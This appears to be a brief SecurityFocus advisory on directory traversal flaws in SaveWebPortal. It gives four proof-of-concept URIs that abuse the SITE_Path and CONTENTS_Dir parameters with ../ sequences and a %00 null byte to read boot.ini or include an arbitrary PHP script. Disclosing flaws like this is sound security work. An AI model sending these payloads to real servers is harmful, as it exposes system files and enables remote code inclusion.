SaveWebPortal Multiple Directory Traversal Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00
http://www.example.com/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00

http://www.example.com/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00
http://www.example.com/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00


 

Privacy Statement
Copyright 2010, SecurityFocus